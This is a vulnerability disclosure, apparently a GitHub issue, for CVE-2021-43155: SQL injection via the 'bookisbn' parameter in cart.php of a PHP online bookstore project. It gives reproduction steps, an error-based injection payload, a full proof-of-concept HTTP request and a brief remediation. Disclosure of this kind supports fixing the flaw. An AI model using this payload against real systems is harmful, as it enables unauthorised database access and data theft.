Headline
CVE-2021-43155: SQL Injection vulnerability via the "bookisbn" parameter in cart.php · Issue #18 · projectworldsofficial/online-book-store-project-in-php
Projectsworlds Online Book Store PHP v1.0 is vulnerable to SQL injection via the “bookisbn” parameter in cart.php.
Author
KhanhCM (@khanhchauminh)
Version: 1.0****Steps to reproduce
- Go to any book detail page by clicking on that book’s image.
- Click on "Purchase / Add to cart" button.
- Intercept the request and insert the payload in the value of the
bookisbn
parameter.
Example payload:
' or updatexml(1,concat(0x7e,(version())),0) -- a
Proof-of-concept
POST /cart.php HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 137
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.89.145:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1:8888/book.php?bookisbn=978-1-49192-706-9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=2vmimaak7ho1ccnj624a5js0lq
Connection: close
bookisbn=978-1-49192-706-9%27%20or%20updatexml%281%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20--%20a&cart=Purchase+%2F+Add+to+cart
Response in Burpsuite
Source code review****cart.php
functions/cart_functions.php
functions/database_functions.php
Remediation
Validate input of bookisbn
parameter in cart.php
.